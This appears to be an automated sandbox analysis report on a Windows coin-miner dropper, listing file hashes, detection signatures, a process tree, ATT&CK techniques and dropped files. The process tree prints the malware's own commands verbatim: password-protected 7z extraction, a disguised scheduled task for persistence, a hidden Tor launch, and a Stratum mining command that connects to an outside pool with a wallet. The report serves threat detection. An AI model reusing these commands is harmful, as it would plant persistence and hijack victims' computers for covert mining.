Analysis

  • max time kernel
    155s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    16-10-2021 14:31

General

  • Target

    386382628bdab18db3b929a566756da5.exe

  • Size

    15.9MB

  • MD5

    386382628bdab18db3b929a566756da5

  • SHA1

    fcd17baf5894cede249211bab735f97d8f6b5770

  • SHA256

    90e4fd2f0792a3068a2048c3dd0fd42e1f7e4da082d76cbe52989757a4a987d5

  • SHA512

    8916ea2666d16430c26b55fd11f0195a96f352f79cc884029b380f8001cf46f1aa0a9b86d36d8dbc15f39c95b163301546ccbafcde3bedd78ae5267063f52a05

Score
10/10

Malware Config

Signatures

  • suricata: ET MALWARE Win32/MOOZ.THCCABO CoinMiner CnC Checkin

    suricata: ET MALWARE Win32/MOOZ.THCCABO CoinMiner CnC Checkin

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Detected Stratum cryptominer command

    Looks to be attempting to contact Stratum mining pool.

  • XMRig Miner Payload 3 IoCs
  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 12 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • autoit_exe 9 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • NTFS ADS 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 15 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\386382628bdab18db3b929a566756da5.exe
    "C:\Users\Admin\AppData\Local\Temp\386382628bdab18db3b929a566756da5.exe"
    1⤵
    • Loads dropped DLL
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1764
    • C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt
      C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1072
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:288
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
        3⤵
        • Creates scheduled task(s)
        PID:1036
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {BF28B178-B927-46B7-BD14-939CE97C463C} S-1-5-21-2955169046-2371869340-1800780948-1000:UKNHJUQT\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1148
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
      C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
      2⤵
      • Executes dropped EXE
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:1928
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
      C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:1528
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
        7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:980
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe" -f TorConfig
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:1956
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
        7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1264
      • C:\Windows\SysWOW64\attrib.exe
        -o stratum+tcp://eth-eu1.nanopool.org:9433 -u 0xF9A8F743bF88C8dcf023104D91f5f09426F3f73E.69EEECFE -p x -t 2
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Views/modifies file attributes
        PID:1888
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
      C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
      2⤵
      • Executes dropped EXE
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:1056
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
      C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
      2⤵
      • Executes dropped EXE
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:288

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Hidden Files and Directories

1
T1158

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Hidden Files and Directories

1
T1158

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    MD5

    f14854eee273f6b5672eb95d8a6a9733

    SHA1

    31883473455e52081cf1b57cf3deaa69b1e2852b

    SHA256

    7b02987621a85a61c34cd7b702834ccdfdc719201d836f5864cf29260d648383

    SHA512

    db2322d34cdcbc301e341158ba5ddea89cdb99e34e24a0b8cbb29837162bb5b127d776f42c783bd4655207a86b0736a1524af62e4e2b602304bd4cfea4e2f87e

  • C:\Users\Admin\AppData\Local\Temp\32.exe
    MD5

    92db5c0ef23537fc42654904c83248b7

    SHA1

    8106cdd679416fe075720fa4069c1b857a90ebed

    SHA256

    b10359a841665c6d12aa319a4b1e73bcd4b9dbffdf1e50d3950da04fa99ca258

    SHA512

    8cd475f82955c9a7c6b8c4bb3dd388982286dfca24bb87f81ac72df7a9fbb40ace80c4aa41dd1c4329507c9d66e4bc8415b5bd3d910de9a92863f34346210e05

  • C:\Users\Admin\AppData\Local\Temp\64.exe
    MD5

    8429562f032e9f70369729e23ff37b2c

    SHA1

    6c6518a42567e69182c577f870f3284ea78da1a1

    SHA256

    506fdf48fcdb4e3d973ffb1e4e85801f5f860dbfea91735eb14e97f74d39b1d4

    SHA512

    7fa4ef8d22d30d6634c6c1a457fa92e13ee765bb1ca744edb08b5d8bd9484341adc8b11cc3a7e0d4c68bc8fa7bfdac722b8f4f09dad9dee1515002e362a587ad

  • C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt
    MD5

    43141e85e7c36e31b52b22ab94d5e574

    SHA1

    cfd7079a9b268d84b856dc668edbb9ab9ef35312

    SHA256

    ea308c76a2f927b160a143d94072b0dce232e04b751f0c6432a94e05164e716d

    SHA512

    9119ae7500aa5cccf26a0f18fd8454245347e3c01dabba56a93dbaaab86535e62b1357170758f3b3445b8359e7dd5d37737318a5d8a6047c499d32d5b64126fc

  • C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt
    MD5

    dee195c4307bfa52752b04330f601e88

    SHA1

    462964034bcae3a5976929b501d03e77f083d323

    SHA256

    8d2c6b30d2548766cc2915619d2ce1044cc2fd90090c981e98e2e0bd8d3191eb

    SHA512

    283d3f350d93100169be0e1a04b680047884eb729c882fd545667fac6b22a39c2cafda269ca0b61d228ebeca2b960537e2ee61aa827abe8092c357994bcf73fd

  • C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml
    MD5

    9160347bec74471e1a79edfd950629ae

    SHA1

    c149a7e5aab6e349a70b7b458d0eaaa9d301c790

    SHA256

    0fe356f3d04bb43f772604b049fd2b20f3038ca2ce84bf9778b8ccdd481d77ab

    SHA512

    b8061834f658567a1e742496c38688bdecd60191a92163d47470f64aa1fba23e92dd36fa1d2bb7efa36f14002c0606013973718b9f107e62d845a17be4b0d358

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    MD5

    92db5c0ef23537fc42654904c83248b7

    SHA1

    8106cdd679416fe075720fa4069c1b857a90ebed

    SHA256

    b10359a841665c6d12aa319a4b1e73bcd4b9dbffdf1e50d3950da04fa99ca258

    SHA512

    8cd475f82955c9a7c6b8c4bb3dd388982286dfca24bb87f81ac72df7a9fbb40ace80c4aa41dd1c4329507c9d66e4bc8415b5bd3d910de9a92863f34346210e05

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    MD5

    92db5c0ef23537fc42654904c83248b7

    SHA1

    8106cdd679416fe075720fa4069c1b857a90ebed

    SHA256

    b10359a841665c6d12aa319a4b1e73bcd4b9dbffdf1e50d3950da04fa99ca258

    SHA512

    8cd475f82955c9a7c6b8c4bb3dd388982286dfca24bb87f81ac72df7a9fbb40ace80c4aa41dd1c4329507c9d66e4bc8415b5bd3d910de9a92863f34346210e05

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    MD5

    92db5c0ef23537fc42654904c83248b7

    SHA1

    8106cdd679416fe075720fa4069c1b857a90ebed

    SHA256

    b10359a841665c6d12aa319a4b1e73bcd4b9dbffdf1e50d3950da04fa99ca258

    SHA512

    8cd475f82955c9a7c6b8c4bb3dd388982286dfca24bb87f81ac72df7a9fbb40ace80c4aa41dd1c4329507c9d66e4bc8415b5bd3d910de9a92863f34346210e05

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    MD5

    92db5c0ef23537fc42654904c83248b7

    SHA1

    8106cdd679416fe075720fa4069c1b857a90ebed

    SHA256

    b10359a841665c6d12aa319a4b1e73bcd4b9dbffdf1e50d3950da04fa99ca258

    SHA512

    8cd475f82955c9a7c6b8c4bb3dd388982286dfca24bb87f81ac72df7a9fbb40ace80c4aa41dd1c4329507c9d66e4bc8415b5bd3d910de9a92863f34346210e05

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    MD5

    92db5c0ef23537fc42654904c83248b7

    SHA1

    8106cdd679416fe075720fa4069c1b857a90ebed

    SHA256

    b10359a841665c6d12aa319a4b1e73bcd4b9dbffdf1e50d3950da04fa99ca258

    SHA512

    8cd475f82955c9a7c6b8c4bb3dd388982286dfca24bb87f81ac72df7a9fbb40ace80c4aa41dd1c4329507c9d66e4bc8415b5bd3d910de9a92863f34346210e05

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    MD5

    92db5c0ef23537fc42654904c83248b7

    SHA1

    8106cdd679416fe075720fa4069c1b857a90ebed

    SHA256

    b10359a841665c6d12aa319a4b1e73bcd4b9dbffdf1e50d3950da04fa99ca258

    SHA512

    8cd475f82955c9a7c6b8c4bb3dd388982286dfca24bb87f81ac72df7a9fbb40ace80c4aa41dd1c4329507c9d66e4bc8415b5bd3d910de9a92863f34346210e05

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    MD5

    92db5c0ef23537fc42654904c83248b7

    SHA1

    8106cdd679416fe075720fa4069c1b857a90ebed

    SHA256

    b10359a841665c6d12aa319a4b1e73bcd4b9dbffdf1e50d3950da04fa99ca258

    SHA512

    8cd475f82955c9a7c6b8c4bb3dd388982286dfca24bb87f81ac72df7a9fbb40ace80c4aa41dd1c4329507c9d66e4bc8415b5bd3d910de9a92863f34346210e05

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp
    MD5

    df8a476147110968dd031c327381dbfa

    SHA1

    04a7687e7598a18a1f07a6e340c17de7c8777f1b

    SHA256

    d6ad895616e9a28329f6f2dfb198fb86dd33d2d2da05ad5f1b2a1fcf3dcdf37c

    SHA512

    53fb79bbc1f60b20dc8048697f619889310f0bfc50e3f57fd6435b0127d273b65de00f412d807dccc9a04736a71377aa1c24485d9793d66f3659ba29e214b1cd

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.txt
    MD5

    dcd8f4d7b93646261bbb63f9db68af07

    SHA1

    ae178435ac21bab77a519e4e8e3a913ba8a0bd48

    SHA256

    a98157a333cdc339c0ff60dfd5858287d4eb5f19af628398e3f0c48dee2e35e8

    SHA512

    37f1c2538df2f00f67fffc97ed85309acda92e5aa4304ed5ceedabbfb1a7f827e546eaf29d0c795348f42cfc31b8ae2f7c9c97b3f12d697171f73cbafc2ffe93

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp
    MD5

    c6e3fbdf079050e85c513a45f069b725

    SHA1

    08b567151e7c405af4f2fb7387ae53ac176f3c89

    SHA256

    2f3cd91bab24b330d0303550adaf58110469f24eb653d4bb661368f207f79ac5

    SHA512

    c84b3409cdb62be3683883a50ba8925bf6bf86ac8129ed78e134cf51bc79cca293a8f8a773c60d3e88df5e2b1fc8b96b1026b45e51cdae4a9168190ea286dd26

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-certs
    MD5

    7d00df6d8e34a61fad1b241e4625da07

    SHA1

    001caffe8544328c1aa54e4a2e4710150a968b87

    SHA256

    b46b99e8a136c9198faff23fdd4bcd0644e32a7001f9eb5fe94ace870ff1601c

    SHA512

    0c1d041354c678c046cfa9fb80cc33f0b8ff5556f844db083d9364b2f81495583a384b81a8280d39378b97822dea9964756b20b998b99e059ce4cc3d0a95e20b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdesc-consensus
    MD5

    9002307541f2949b1fd1f513ef00e046

    SHA1

    fd39203dcfdaa851797ac9be3bfe74b3735412f8

    SHA256

    5c2c3a31af484fd1d59a0fe5fa96f3233c61d5974bdbec5b20236dabbd904ae4

    SHA512

    62aa142cba67ecb35618dd46ea8c648af3411a28226c6b8c3378c181aeac6fa0dc48a1ec93bea994c37c73be736f3e63bef82e0cb4a56c4cdbbbcb84c20c2177

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdescs.new
    MD5

    1e730399b7e6478fbe3fe13d3b7f0cc8

    SHA1

    d9992db0e2dbd652749496c19902e075ef1255a4

    SHA256

    a71097e226bb721a8b445033744b04f09dd6a0f979af666e4ad92d5fb6932369

    SHA512

    814e91aca40702e1236f060c9c47d2a6b04a288616c998fe62f449d74d83651e304a3c291ffa12d86b274c47321807ac90d8a7b9d7102168b9e5192d2cd519fa

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\state
    MD5

    fcc6e508b1b2664624cb319313d69fa5

    SHA1

    4a29a68cc588529dfe112af44106a365b16262c9

    SHA256

    81f2f6f23de8bfc5ed5e7188b3608f5978f5ed14090b9407d4eaad2d093ea016

    SHA512

    be0ddfee8429ef725997c10d45ff2d4b04f7d94ff90b526f26de39aa47c16f03147ad566043cdc9da5043d1afcfb012df0a69c0cda5cb4522916cd7bbbe39b24

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\unverified-microdesc-consensus
    MD5

    9002307541f2949b1fd1f513ef00e046

    SHA1

    fd39203dcfdaa851797ac9be3bfe74b3735412f8

    SHA256

    5c2c3a31af484fd1d59a0fe5fa96f3233c61d5974bdbec5b20236dabbd904ae4

    SHA512

    62aa142cba67ecb35618dd46ea8c648af3411a28226c6b8c3378c181aeac6fa0dc48a1ec93bea994c37c73be736f3e63bef82e0cb4a56c4cdbbbcb84c20c2177

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorData\Tor.pid
    MD5

    f048624e848762374c97a6e401b26637

    SHA1

    ff3c4536995a5970246ceb5e8ff0144e9714c374

    SHA256

    c7b523832e114ba51b4ac559908412a83744b3f23984a2583f0168d64360a6f3

    SHA512

    beb72180de5af79b46eaceccbd44f2497f14825a35ebb8e481d0d95311b3ed9694ec8bd411185fe83582e4942f0d8bc8783487359f5532a909303d0af4e74c3a

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorData\TorConfig
    MD5

    b9d2fe9cfa840518fa39039c928d4938

    SHA1

    0561516b7cfa784cf400349983817c8b18817256

    SHA256

    69d57bfb46ef8097c1cfca65885790421d0e0965b7778f165cd7df9368807776

    SHA512

    894510d39a044a37325d73b8348860960b3a78c54e7cdf81357f4b50e8dcf5d47ab98c768e6439949ba835802b2a5e98314441127d9655b027caf246e09e013d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libcrypto-1_1.dll
    MD5

    cb96977385b537823e34caf9853f2354

    SHA1

    227b63287851e911dfee245f3d11e8b8f025a710

    SHA256

    1d962eb33988cb28e5e9ebfe34dfece4990cd65d45135b95d275e8772935f3e9

    SHA512

    be2a562a33ac9b541402e95361558b4c4af3204a3720ba19bc3416dff55d8640ed0371f11adb1987c36ad863feeafa64ed228da9c4d8d2f0ba04ec2c3642b614

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent-2-1-7.dll
    MD5

    a69e51d7fd3dcb99ae22ed5244ea1561

    SHA1

    a924da19fa055d9922ea8b6a0110fe78db3d9f2b

    SHA256

    d690b047ddac601cf6b0a7c5a7edf3194f4cc0a68f0d6751bf35c06eb6dbb0f7

    SHA512

    661604c8d0fd8c30be6fc49572b30bcf2ff13406048ce26168d5d9f5b4ebe7f7ced28266c3a8e575d63cb8ca4b0479aa71837fd9432ac5d8d7bb84e9bcb9e024

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent_core-2-1-7.dll
    MD5

    b0eef688575d48a5fecee09ba20ca89f

    SHA1

    7c12369d8ace0dc07c1083c31c3c003c554935f2

    SHA256

    157cbf6301ddc93134210538d5120888e09cb49ba0856395db6668c19befa0e7

    SHA512

    5cfed05ba9b69926ac38f1c77d1dcdc50e55029038f4535efa8857fac25d46a44f5abf6ccb0aec00cac33d6549c762c4c9e7583491986255cf9d6ed263f71bf7

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent_extra-2-1-7.dll
    MD5

    12a4c231f7af1d845aeba4a9fbfc7a65

    SHA1

    e8d20935dd2e3324bdcc43c51e6d2d9fccac41bc

    SHA256

    829eda7b3523d780cea9d703a54d7becd10d29bb61286e57a237b4097a7c013f

    SHA512

    a76e9af9e3fb0ebe6fab0ef666dc2a1e681454ed751fe2bf5984b8d30448df2a616d5945f58702d95a28e71271dca5325ccdd34785de8c029892c59a0ecf3314

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libgcc_s_sjlj-1.dll
    MD5

    1b1d7f6b1a3019fa632b35586e9ca1fd

    SHA1

    13a491e084b602519c54636def753f6e74414f0b

    SHA256

    785bb87578a934a4d537aa83ce05dd08d494e06ebaa83288774befb53c75839c

    SHA512

    0c3951433df4dde1268d715569d2391257613f1b8624126efcb7e41b035406a499cf3a3c54f8860708ee4105d852cf734d8b58623722a9a6c94bb105ef169dd0

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssl-1_1.dll
    MD5

    6f9a917317a42f99f1675031c9cca0fa

    SHA1

    7ab549457be73fe4e5a6125670d570e9f53d0270

    SHA256

    21d2283d25c8ae77bb8b36460b18fc606676715bef1da5b43ac30cd8544ec6f1

    SHA512

    430692ab8a534f5fee0dd011fd0419d23373061925e0853f4e505d428203bda19bd3b1fc1c730f930bf72dbb3b3f071e385bcf007784830526024c13390965fe

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssp-0.dll
    MD5

    1029ed90e9efe158ccdf87010c712512

    SHA1

    9376663ae540ce1423ed459b76f2499d1a02d4de

    SHA256

    30339de06920dae72825b4522196acafb447e0b8693755879890e6d57a2be51c

    SHA512

    d4fdb9d309bd6833ebf8ec1d48a32175f0b2b1c24c947d5b30858f1d78e41062bad68c3c6bfc9d6ae2c461f293b5f970784606b8b337af8ba78880574fa705de

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libwinpthread-1.dll
    MD5

    ac4ab5310452f8a3355b8c7ed9698139

    SHA1

    31fc30c5da06dfceeb456532bf6a1edc7f160add

    SHA256

    580eea581190983f77693f2524a60b19cf21a82c85c9f40dbd8c71d105a47f50

    SHA512

    1a1412dc14e2e100597d5248dba9f81649ca3a789f90da2dc681fe082456d30eeda476bddc8160fbe784e2fc9a0f7b33977fd303fc169b506d7b82591913ba51

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe
    MD5

    66757501d205ece5ee4a11a0d45c1845

    SHA1

    7aadaf86d061400853a583849951d45dae69a0a5

    SHA256

    ad65a1a4a41f8bb86f5a0f28cc29c60a821f8b3becdfdfba065d11eb379ada71

    SHA512

    477e76afdc1470ecf4043665172fd6ccd39c4fa7b011626273952d796f84d6346096422ad08ba9f85d4ef3cce96d7be573c01e006691a69f3366b8ebdb17df60

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe
    MD5

    66757501d205ece5ee4a11a0d45c1845

    SHA1

    7aadaf86d061400853a583849951d45dae69a0a5

    SHA256

    ad65a1a4a41f8bb86f5a0f28cc29c60a821f8b3becdfdfba065d11eb379ada71

    SHA512

    477e76afdc1470ecf4043665172fd6ccd39c4fa7b011626273952d796f84d6346096422ad08ba9f85d4ef3cce96d7be573c01e006691a69f3366b8ebdb17df60

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\zlib1.dll
    MD5

    d8f569dab7523b80f24a089c7f6e87ab

    SHA1

    dbb1a96bb86249ac3ef9b0dfa8d77956b1d5c687

    SHA256

    41f1adf140714c1f856d3a709f68e1de6d29a4c17afdfc758639b7785c66bdf5

    SHA512

    23afff6469f56224e75154c5cdd84217a3a746c221a16e5bc9c5b47d4aa4c9889da86256c73be614464ee9b57aa36038b830ccf94beb43d85ccb9874bb3ec99c

  • \Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt
    MD5

    43141e85e7c36e31b52b22ab94d5e574

    SHA1

    cfd7079a9b268d84b856dc668edbb9ab9ef35312

    SHA256

    ea308c76a2f927b160a143d94072b0dce232e04b751f0c6432a94e05164e716d

    SHA512

    9119ae7500aa5cccf26a0f18fd8454245347e3c01dabba56a93dbaaab86535e62b1357170758f3b3445b8359e7dd5d37737318a5d8a6047c499d32d5b64126fc

  • \Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libcrypto-1_1.dll
    MD5

    cb96977385b537823e34caf9853f2354

    SHA1

    227b63287851e911dfee245f3d11e8b8f025a710

    SHA256

    1d962eb33988cb28e5e9ebfe34dfece4990cd65d45135b95d275e8772935f3e9

    SHA512

    be2a562a33ac9b541402e95361558b4c4af3204a3720ba19bc3416dff55d8640ed0371f11adb1987c36ad863feeafa64ed228da9c4d8d2f0ba04ec2c3642b614

  • \Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent-2-1-7.dll
    MD5

    a69e51d7fd3dcb99ae22ed5244ea1561

    SHA1

    a924da19fa055d9922ea8b6a0110fe78db3d9f2b

    SHA256

    d690b047ddac601cf6b0a7c5a7edf3194f4cc0a68f0d6751bf35c06eb6dbb0f7

    SHA512

    661604c8d0fd8c30be6fc49572b30bcf2ff13406048ce26168d5d9f5b4ebe7f7ced28266c3a8e575d63cb8ca4b0479aa71837fd9432ac5d8d7bb84e9bcb9e024

  • \Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libgcc_s_sjlj-1.dll
    MD5

    1b1d7f6b1a3019fa632b35586e9ca1fd

    SHA1

    13a491e084b602519c54636def753f6e74414f0b

    SHA256

    785bb87578a934a4d537aa83ce05dd08d494e06ebaa83288774befb53c75839c

    SHA512

    0c3951433df4dde1268d715569d2391257613f1b8624126efcb7e41b035406a499cf3a3c54f8860708ee4105d852cf734d8b58623722a9a6c94bb105ef169dd0

  • \Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssl-1_1.dll
    MD5

    6f9a917317a42f99f1675031c9cca0fa

    SHA1

    7ab549457be73fe4e5a6125670d570e9f53d0270

    SHA256

    21d2283d25c8ae77bb8b36460b18fc606676715bef1da5b43ac30cd8544ec6f1

    SHA512

    430692ab8a534f5fee0dd011fd0419d23373061925e0853f4e505d428203bda19bd3b1fc1c730f930bf72dbb3b3f071e385bcf007784830526024c13390965fe

  • \Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssp-0.dll
    MD5

    1029ed90e9efe158ccdf87010c712512

    SHA1

    9376663ae540ce1423ed459b76f2499d1a02d4de

    SHA256

    30339de06920dae72825b4522196acafb447e0b8693755879890e6d57a2be51c

    SHA512

    d4fdb9d309bd6833ebf8ec1d48a32175f0b2b1c24c947d5b30858f1d78e41062bad68c3c6bfc9d6ae2c461f293b5f970784606b8b337af8ba78880574fa705de

  • \Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libwinpthread-1.dll
    MD5

    ac4ab5310452f8a3355b8c7ed9698139

    SHA1

    31fc30c5da06dfceeb456532bf6a1edc7f160add

    SHA256

    580eea581190983f77693f2524a60b19cf21a82c85c9f40dbd8c71d105a47f50

    SHA512

    1a1412dc14e2e100597d5248dba9f81649ca3a789f90da2dc681fe082456d30eeda476bddc8160fbe784e2fc9a0f7b33977fd303fc169b506d7b82591913ba51

  • \Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe
    MD5

    66757501d205ece5ee4a11a0d45c1845

    SHA1

    7aadaf86d061400853a583849951d45dae69a0a5

    SHA256

    ad65a1a4a41f8bb86f5a0f28cc29c60a821f8b3becdfdfba065d11eb379ada71

    SHA512

    477e76afdc1470ecf4043665172fd6ccd39c4fa7b011626273952d796f84d6346096422ad08ba9f85d4ef3cce96d7be573c01e006691a69f3366b8ebdb17df60

  • \Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe
    MD5

    66757501d205ece5ee4a11a0d45c1845

    SHA1

    7aadaf86d061400853a583849951d45dae69a0a5

    SHA256

    ad65a1a4a41f8bb86f5a0f28cc29c60a821f8b3becdfdfba065d11eb379ada71

    SHA512

    477e76afdc1470ecf4043665172fd6ccd39c4fa7b011626273952d796f84d6346096422ad08ba9f85d4ef3cce96d7be573c01e006691a69f3366b8ebdb17df60

  • \Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe
    MD5

    66757501d205ece5ee4a11a0d45c1845

    SHA1

    7aadaf86d061400853a583849951d45dae69a0a5

    SHA256

    ad65a1a4a41f8bb86f5a0f28cc29c60a821f8b3becdfdfba065d11eb379ada71

    SHA512

    477e76afdc1470ecf4043665172fd6ccd39c4fa7b011626273952d796f84d6346096422ad08ba9f85d4ef3cce96d7be573c01e006691a69f3366b8ebdb17df60

  • \Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe
    MD5

    66757501d205ece5ee4a11a0d45c1845

    SHA1

    7aadaf86d061400853a583849951d45dae69a0a5

    SHA256

    ad65a1a4a41f8bb86f5a0f28cc29c60a821f8b3becdfdfba065d11eb379ada71

    SHA512

    477e76afdc1470ecf4043665172fd6ccd39c4fa7b011626273952d796f84d6346096422ad08ba9f85d4ef3cce96d7be573c01e006691a69f3366b8ebdb17df60

  • \Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\zlib1.dll
    MD5

    d8f569dab7523b80f24a089c7f6e87ab

    SHA1

    dbb1a96bb86249ac3ef9b0dfa8d77956b1d5c687

    SHA256

    41f1adf140714c1f856d3a709f68e1de6d29a4c17afdfc758639b7785c66bdf5

    SHA512

    23afff6469f56224e75154c5cdd84217a3a746c221a16e5bc9c5b47d4aa4c9889da86256c73be614464ee9b57aa36038b830ccf94beb43d85ccb9874bb3ec99c

  • memory/288-110-0x0000000000000000-mapping.dmp
  • memory/288-62-0x0000000000000000-mapping.dmp
  • memory/980-73-0x0000000000080000-0x0000000000140000-memory.dmp
    Filesize

    768KB

  • memory/980-79-0x0000000000080000-0x0000000000140000-memory.dmp
    Filesize

    768KB

  • memory/980-74-0x0000000000080000-0x0000000000140000-memory.dmp
    Filesize

    768KB

  • memory/980-75-0x0000000000111C58-mapping.dmp
  • memory/1036-63-0x0000000000000000-mapping.dmp
  • memory/1056-111-0x0000000000000000-mapping.dmp
  • memory/1072-57-0x0000000000000000-mapping.dmp
  • memory/1264-118-0x0000000000111C58-mapping.dmp
  • memory/1528-68-0x0000000000000000-mapping.dmp
  • memory/1764-61-0x00000000001E0000-0x00000000001E1000-memory.dmp
    Filesize

    4KB

  • memory/1764-55-0x0000000075C21000-0x0000000075C23000-memory.dmp
